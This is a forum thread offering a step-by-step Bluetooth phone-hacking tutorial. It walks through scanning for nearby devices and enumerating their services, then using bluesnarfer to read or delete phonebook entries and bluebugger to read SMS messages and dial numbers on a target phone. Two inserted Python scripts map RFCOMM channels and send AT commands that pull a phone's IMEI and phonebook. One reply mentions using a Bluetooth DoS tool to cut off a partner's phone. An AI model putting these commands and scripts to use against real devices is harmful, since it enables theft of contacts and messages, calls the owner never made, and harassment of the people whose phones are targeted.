Page 1 of 2, results 1 to 10 of 45

Thread: Bluesnarfer & Bluebugger Guide With Backtrack


    #1 drgr33n (Very good friend of the forum)
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    Bluesnarfer & Bluebugger Guide With Backtrack

    Hey Guys

    Just thought I'd post a little on Bluetooth hacking because I can see there are a lot of questions and not a lot of answers. So here's how I hacked my Samsung D600.

    First I popped to my local supermarket and picked myself up a Bluetooth dongle for 6.99!!!! Because my shitty Toshiba Satellite P100 doesn't have Bluetooth.

    OK, first let's configure BT.

    Type :

    bt ~ # mkdir -p /dev/bluetooth/rfcomm
    bt ~ # mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

    That's Bluesnarfer done; now for Bluebugger.

    Type:

    bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0

    OK, now we can fire up our Bluetooth adaptor, so type:

    bt ~ # hciconfig hci0 up

    Now our Bluetooth adaptor should be ready; check by typing:

    bt ~ # hciconfig hci0

    and you should see something like this:

    hci0:   Type: USB
            BD Address: 00:11:22:33:44:55  ACL MTU: 678:8  SCO MTU: 48:10
            UP RUNNING
            RX bytes:85 acl:0 sco:0 events:9 errors:0
            TX bytes:33 acl:0 sco:0 commands:9 errors:0

    OK, now we are ready to scan, so type:

    bt ~ # hcitool scan hci0

    And you should see all the devices in the area. You can also use btscanner, and btscanner has a brute-force scanner for discovering hidden devices.

    Now note the name and MAC of the target and let's move on.

    First thing, let's try to ping our target. Type:

    bt ~ # l2ping <target MAC>

    If you don't get a ping, GOOD LUCK.

    Next we need to find out a little about the device we want to hack, so let's fire up blueprint.

    And type:

    bt ~ # sdptool browse --tree --l2cap <target MAC>

    And you should get something like this:


    Code:
    Browsing 00:16:DB:A1:B6:B9 ...
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10000
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID128 : 0xdb1d8f12-95f3-402c-9b97-bc504c9a-55c4
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x1
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x6 - LanguageBaseAttributeIDList
      Data Sequence
        Code ISO639 (Integer) : 0x656e
        Encoding (Integer) : 0x6a
        Base Offset (Integer) : 0x100
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID128 : 0x1cdb1d8f-1295-f340-2c9b-97bc504c-9a55
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 57 42 54 45 58 54 00 00
    Attribute Identifier : 0x8003
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10001
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1101 - SerialPort
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x2
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1101 - SerialPort
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 53 65 72 69 61 6c 20 50 6f 72 74 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10002
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1103 - DialupNetworking (DUN)
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x3
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1103 - DialupNetworking (DUN)
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 44 69 61 6c 2d 75 70 20 4e 65 74 77 6f 72 6b 69 6e 67 00 00
    Attribute Identifier : 0x305
      Integer : 0x0
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10003
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1112 - HeadsetAudioGateway
        UUID16 : 0x1203 - GenericAudio
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x4
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1108 - Headset
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 56 6f 69 63 65 20 47 57 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10004
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x111f - HandsfreeAudioGateway
        UUID16 : 0x1203 - GenericAudio
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x5
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x111e - Handsfree
          Version (Integer) : 0x101
    Attribute Identifier : 0x100
      Data : 56 6f 69 63 65 20 47 57 00 00
    Attribute Identifier : 0x301
      Integer : 0x1
    Attribute Identifier : 0x311
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10005
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x110a - AudioSource
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
          Channel/Port (Integer) : 0x19
        Data Sequence
          UUID16 : 0x0019 - AVDTP
          Channel/Port (Integer) : 0x100
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x110d - AdvancedAudio
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 41 64 76 61 6e 63 65 64 20 61 75 64 69 6f 20 73 6f 75 72 63 65 00 00
    Attribute Identifier : 0x311
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10006
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x110c - RemoteControlTarget
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
          Channel/Port (Integer) : 0x17
        Data Sequence
          UUID16 : 0x0017 - AVCTP
          Channel/Port (Integer) : 0x100
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x110e - RemoteControl
          Version (Integer) : 0x100
    Attribute Identifier : 0x311
      Integer : 0x100
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10007
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1106 - OBEXFileTransfer
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x6
        Data Sequence
          UUID16 : 0x0008 - OBEX
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1106 - OBEXFileTransfer
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10008
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1105 - OBEXObjectPush
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x7
        Data Sequence
          UUID16 : 0x0008 - OBEX
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1105 - OBEXObjectPush
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 4f 62 6a 65 63 74 20 50 75 73 68 00 00
    Attribute Identifier : 0x303
      Data Sequence
        Integer : 0x1
        Integer : 0x3
        Integer : 0x5
        Integer : 0xff

    Now, if you asked me what this means I wouldn't know, but I think it tells you a bit about the channels and what services are running on which channel.

    Anyway, after playing a bit I found that my D600 uses channel 7 for phonebook lookup etc. I think every make and model is different, so you might have to try a few until you get the right one. Like I said, I'm only just getting to grips with Linux, so if anybody knows any more I'd love to read about it.

    End Part 1
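As an added example (not part of drgr33n's post and not BlueZ code), here is a small Python parser for the sdptool listing above. It reads the service records and prints which service sits on which RFCOMM channel, which is the number that bluesnarfer -C and bluebugger -c need, and it flags services that only have an L2CAP PSM and so cannot be reached over RFCOMM at all. The embedded SAMPLE is an abbreviated copy of the listing in the post (the AudioSource and OBEX Object Push records); run it with a Bluetooth address as the argument and it calls sdptool itself (assumes sdptool is on the PATH).

```python
#!/usr/bin/env python3
"""Parse `sdptool browse --tree --l2cap <bdaddr>` output into a service map.

Added example, not code from the post or from BlueZ. It answers the question the
post leaves open: which service sits on which RFCOMM channel, i.e. the number
bluesnarfer -C and bluebugger -c take.
"""
import re
import subprocess
import sys

# Abbreviated copy of the sdptool listing in the post above (the AudioSource
# and OBEX Object Push records), embedded so this runs offline.
SAMPLE = """\
Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10005
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x110a - AudioSource
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
      Channel/Port (Integer) : 0x19
    Data Sequence
      UUID16 : 0x0019 - AVDTP
      Channel/Port (Integer) : 0x100
Attribute Identifier : 0x100
  Data : 41 64 76 61 6e 63 65 64 20 61 75 64 69 6f 20 73 6f 75 72 63 65 00 00

Attribute Identifier : 0x0 - ServiceRecordHandle
  Integer : 0x10008
Attribute Identifier : 0x1 - ServiceClassIDList
  Data Sequence
    UUID16 : 0x1105 - OBEXObjectPush
Attribute Identifier : 0x4 - ProtocolDescriptorList
  Data Sequence
    Data Sequence
      UUID16 : 0x0100 - L2CAP
    Data Sequence
      UUID16 : 0x0003 - RFCOMM
      Channel/Port (Integer) : 0x7
    Data Sequence
      UUID16 : 0x0008 - OBEX
Attribute Identifier : 0x100
  Data : 4f 62 6a 65 63 74 20 50 75 73 68 00 00
"""

ATTR_RE = re.compile(r"^\s*Attribute Identifier : (0x[0-9a-fA-F]+)")
UUID_RE = re.compile(r"^\s*UUID(?:16|32|128) : (\S+)(?: - (.+))?$")
PORT_RE = re.compile(r"^\s*Channel/Port \(Integer\) : (0x[0-9a-fA-F]+)")
DATA_RE = re.compile(r"^\s*Data : ((?:[0-9a-fA-F]{2} ?)+)$")


def parse_sdp(text):
    """Return one dict per service record: classes, rfcomm, psm, name."""
    records, rec, attr, proto = [], None, None, None
    for line in text.splitlines():
        m = ATTR_RE.match(line)
        if m:
            attr = int(m.group(1), 16)
            if attr == 0x0:  # ServiceRecordHandle opens a new record
                rec = {"classes": [], "rfcomm": None, "psm": None, "name": None}
                records.append(rec)
            proto = None
            continue
        if rec is None:
            continue
        if attr == 0x1 and (m := UUID_RE.match(line)):      # ServiceClassIDList
            rec["classes"].append(m.group(2) or m.group(1))
        elif attr == 0x4 and (m := UUID_RE.match(line)):    # ProtocolDescriptorList
            proto = (m.group(2) or m.group(1)).upper()
        elif attr == 0x4 and (m := PORT_RE.match(line)):
            if proto == "RFCOMM":     # server channel: what -C / -c want
                rec["rfcomm"] = int(m.group(1), 16)
            elif proto == "L2CAP":    # PSM only: no RFCOMM on this service
                rec["psm"] = int(m.group(1), 16)
        elif attr == 0x100 and (m := DATA_RE.match(line)):  # ServiceName as raw bytes
            raw = bytes.fromhex(m.group(1).replace(" ", ""))
            rec["name"] = raw.rstrip(b"\x00").decode("ascii", "replace")
    return records


def rfcomm_channels(text):
    """Map service name -> RFCOMM channel, skipping L2CAP-only services."""
    return {r["name"] or ",".join(r["classes"]): r["rfcomm"]
            for r in parse_sdp(text) if r["rfcomm"] is not None}


if __name__ == "__main__":
    # With a bdaddr argument it runs sdptool for real; without one it parses SAMPLE.
    if len(sys.argv) > 1:
        text = subprocess.run(["sdptool", "browse", "--tree", "--l2cap", sys.argv[1]],
                              capture_output=True, text=True, check=True).stdout
    else:
        text = SAMPLE
    for r in parse_sdp(text):
        where = f"RFCOMM {r['rfcomm']}" if r["rfcomm"] is not None else f"L2CAP PSM {r['psm']}"
        print(f"{r['name'] or '?':24} {', '.join(r['classes']):20} {where}")
```

On the D600 listing in the post this gives Serial Port on 2, Dial-up Networking on 3, OBEX File Transfer on 6 and Object Push on 7, which matches the "channel 7" the author found by trial and error; the audio and remote-control records come out as L2CAP PSMs and are not candidates for an RFCOMM tool.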

    #2 drgr33n (Very good friend of the forum)
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    Part 2

    OK, let's get to it. Start a shell and let's take a look at bluesnarfer's options, so type:

    bt ~ # bluesnarfer

    And you should get :
    Code:
    bluesnarfer, version 0.1 -
    usage: bluesnarfer [options] [ATCMD] -b bt_addr
    
    ATCMD     : valid AT+CMD (GSM EXTENSION)
    
    TYPE      : valid phonebook type ..
    example   : "DC" (dialed call list)
                "SM" (SIM phonebook)
                "RC" (recevied call list)
                "XX" much more
    
    -b bdaddr : bluetooth device address
    -C chan   : bluetooth rfcomm channel
    
    -c ATCMD  : custom action
    -r N-M    : read phonebook entry N to M
    -w N-M    : delete phonebook entry N to M
    -f name   : search "name" in phonebook address
    -s TYPE   : select phonebook memory storage
    -l        : list aviable phonebook memory storage
    -i        : device info

    OK, so now we have some options, let's begin. Type:

    bluesnarfer [options] -C 7 -b <target MAC>

    e.g.: bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55

    And the hack should start.

    Now Bluebugger. Type:

    bluebugger -h

    And you should get :
    Code:
    bluebugger 0.1 (can't post URLs :D)
    -----------------------------------------
    
    Usage: bluebugger [OPTIONS] -a <addr> [MODE]
    
           -a <addr>     = Bluetooth address of target
    
           Options:
           --------
           -m <name>     = Name to use when connecting (default: '')
           -d <device>   = Device to use (default: '/dev/rfcomm')
           -c <channel>  = Channelto use (default: 17)
           -n            = No device name lookup
           -t <timeout>  = Timeout in seconds for name lookup (default: 5)
           -o <file>     = Write output to <file>
    
           Mode:
           -----
           info                   = Read Phone Info   (default)
           phonebook              = Read Phonebook    (default)
           messages               = Read SMS Messages (default)
           dial <num>             = Dial number
           ATCMD                  = Custom Command (e.g. '+GMI')
    
           Note: Modes can be combined, e.g. 'info phonebook +GMI'

    Again, now we have our options, let's hack. Type:

    bluebugger [OPTIONS] -c 7 -a <target MAC> [MODE]

    e.g.: bluebugger -m Dr_GrEeN -c 7 -a 00:11:22:33:44:55 dial 0845GAYPORN

    And again you should see some results.

    The only downside to hacking into my D600 is that you still have to allow it on the phone, so it's not exactly HACKING the D600, but it's a good training session. And now you can go forth and play.

    Hope you lot can understand my bad spelling etc. and have fun.

    PS: Can somebody swap these posts around? Sorry, my fault. And oh yeah, the RFCOMM "Connection refused" error is normally the wrong channel. If after using bluebugger you get an "operation already in progress" error, type:

    hciconfig hci0 down
    hciconfig hci0 reset
    hciconfig hci0 up

    And all should be well.
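Added example, not code from the post or from bluesnarfer/bluebugger: both tools are essentially AT-command clients over an RFCOMM channel, so this Python script does the same job by hand with the standard GSM 07.07 commands behind bluebugger's info and phonebook modes (+CGMI, +CGMM, +CGSN, +CPBS, +CPBR; bluesnarfer's -s SM / -r 1-100 are the same +CPBS/+CPBR pair). It needs Linux, where Python's socket module has AF_BLUETOOTH; the two SAMPLE_* strings are constructed modem replies so the parsing can be checked offline. As the post says, the phone must be paired and must accept the connection, and a refused connection usually means the wrong channel.

```python
#!/usr/bin/env python3
"""Talk GSM AT commands to a phone over RFCOMM, as bluesnarfer/bluebugger do.

Added example, not code from the forum post or from either tool. It opens an
RFCOMM socket to the channel found with sdptool, sends the standard AT commands
behind bluebugger's 'info' and 'phonebook' modes, and parses the replies.
"""
import re
import socket
import sys

# AT commands behind the modes the two tools expose (GSM 07.07 / 3GPP 27.007).
MODE_CMDS = {
    "info": ["AT+CGMI", "AT+CGMM", "AT+CGSN"],        # manufacturer, model, IMEI
    "phonebook": ['AT+CPBS="SM"', "AT+CPBR=1,100"],   # bluesnarfer -s SM -r 1-100
}

# Constructed replies (not captured from a real phone) for offline testing.
SAMPLE_REPLY = ('AT+CPBR=1,3\r\r\n+CPBR: 1,"01234567890",129,"Alice"\r\n'
                '+CPBR: 3,"+441234567890",145,"Bob"\r\n\r\nOK\r\n')
SAMPLE_ERROR = 'AT+CPBR=1,3\r\r\n+CME ERROR: 3\r\n'   # 3 = operation not allowed

CPBR_RE = re.compile(r'^\+CPBR: (\d+),"([^"]*)",(\d+),"([^"]*)"')


def parse_at_response(raw):
    """Split a modem reply into (status, info_lines).

    status is "OK", "ERROR" or the full "+CME ERROR: n" line, or None if the
    final result code has not arrived yet; the command echo is dropped.
    """
    lines = [l.strip() for l in raw.replace("\r", "\n").split("\n") if l.strip()]
    status, info = None, []
    for l in lines:
        if l.startswith("AT+"):          # echo of the command we sent
            continue
        if l in ("OK", "ERROR") or l.startswith(("+CME ERROR", "+CMS ERROR")):
            status = l
            break
        info.append(l)
    return status, info


def parse_cpbr(info_lines):
    """Turn +CPBR lines into (index, number, type, name) tuples."""
    out = []
    for l in info_lines:
        m = CPBR_RE.match(l)
        if m:
            out.append((int(m.group(1)), m.group(2), int(m.group(3)), m.group(4)))
    return out


def at_exchange(sock, cmd, timeout=5.0):
    """Send one AT command and read until the final result code."""
    sock.settimeout(timeout)
    sock.sendall((cmd + "\r").encode())
    buf = b""
    while True:
        chunk = sock.recv(1024)
        if not chunk:
            break
        buf += chunk
        status, _ = parse_at_response(buf.decode("latin-1"))
        if status is not None:
            break
    return parse_at_response(buf.decode("latin-1"))


def rfcomm_connect(bdaddr, channel):
    """Open an RFCOMM channel. ConnectionRefusedError is the "Connection
    refused" the post mentions: wrong channel, or the phone declined."""
    s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
    s.connect((bdaddr, channel))
    return s


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: atsession.py <bdaddr> <rfcomm channel>")
    with rfcomm_connect(sys.argv[1], int(sys.argv[2])) as s:
        for cmd in MODE_CMDS["info"] + MODE_CMDS["phonebook"]:
            status, info = at_exchange(s, cmd)
            print(cmd, "->", status)
            for entry in (parse_cpbr(info) if cmd.startswith("AT+CPBR") else info):
                print("   ", entry)
```

A +CME ERROR instead of phonebook entries is the phone refusing the storage or the command rather than a transport problem; that is the case to distinguish from a refused connect, which never gets as far as an AT reply.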

    #3 Senior Member
    Join Date: Apr 2007
    Posts: 3,385

    Dr_GrEen,

    Bravo!!!

    EXCELLENT TUTORIAL, AND WELCOME TO THE FORUMS!

    P.S.

    You know way 2 much about hacking Bluetooth to be a no0bie

    Moving to tutorial Section.

    Keep up the Great work!

    #4 shamanvirtuel (Senior Member)
    Join Date: Mar 2010
    Location: Somewhere in the "Ex" human right country
    Posts: 2,988

    Yep, excellent work. I wish more new members contributed in such a fruitful manner.

    Welcome, and don't hesitate to ask if you've got a problem with anything.

    BTW, you may open an account on our wiki and add this tutorial to our howto section. Could be really cool.

    THX

    #5 imported_wyze (Jenkem Addict)
    Join Date: Jul 2007
    Posts: 1,543

    Awesome tut, man. I was going to do a similar write-up, but time hasn't been my friend as of late.

    Another fun tool I like to use to let my old lady know her time is up playing games on her Blackberry (after hours on end) is a BT DoS program in the tbear suite, tanya.

    #6 NoobBiscUiT (Junior Member)
    Join Date: Jun 2007
    Posts: 58

    OK, so this is what I did and got. I've been working with this for a while now, and I HAVE searched everything; that's how I found this thread and other useful tools.
    *with editing

    bluebugger -c 8 -a 00:19:A1:F6:00:75 dial 1434560092
    bluebugger 0.1 ( MaJoMu |
    -----------------------------------------

    Target Device: '00:19:A1:F6:00:75'
    Target Name: 'LG'

    tcgetattr failed: Input/output error
    bt_rfcomm_config() failed

    Channel 8 is my BT modem, and I can connect to it, BUT when it establishes a connection my phone asks for a passkey, and I enter a random character, then it says connection failed.
    I'm guessing there's a way to create a passkey between the phone and my computer through BT, but I don't know how, and that's why I'm asking this way too long question.
    Guidance would be great.
    Thanks

    #7 (Just burned his ISO)
    Join Date: Aug 2007
    Posts: 3

    I've only used RFCOMM to do simple tasks and only with my cellular phone, so I can't really offer any advice on how to use that program. But I do know that most of the time, except for in cellular phone pairing, there is a default passkey. A couple of different BT devices I own use 0000. Try that.

    #8 NoobBiscUiT (Junior Member)
    Join Date: Jun 2007
    Posts: 58

    Right, but I was using bluebugger, so unless I have to do something with rfcomm first, why would that failure message come up?
    My understanding is that they are different programs and have nothing to do with each other.

    #9 drgr33n (Very good friend of the forum)
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    Sorry, didn't see this question lol

    Please enter this command and post results

    Code:
    sdptool browse --l2cap <target MAC>

    #10 NoobBiscUiT (Junior Member)
    Join Date: Jun 2007
    Posts: 58

    Deal.
    I believe I did this command when I first found my phone using btscanner,
    then l2ping like you said.

    RESULTS..... wait. I didn't boot with my Bluetooth.
    OK, I'll redo this.

